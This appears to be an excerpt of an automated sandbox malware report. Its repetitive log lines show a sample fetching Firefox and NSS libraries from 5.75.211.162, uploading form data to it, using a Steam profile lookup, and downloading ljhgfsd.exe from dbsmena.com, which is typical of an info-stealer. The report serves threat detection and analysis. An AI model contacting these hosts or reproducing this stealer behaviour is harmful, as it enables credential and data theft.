                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 98097Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_00406963
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: dbsmena.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                        Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                        Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
                        Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
                        Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304083321.000000002298D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://5.75.211.162
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/freebl3.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/mozglue.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/msvcp140.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/nss3.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/softokn3.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/softokn3.dll6V#~
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/vcruntime140.dll
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/xmx~3
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162AAAFC
                        Source: RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162AKKJD
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162EBFBA
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162rt/form-data;
                        Source: AAAAKJ.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                        Source: AAAAKJ.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: AAAAKJ.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: AAAAKJ.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
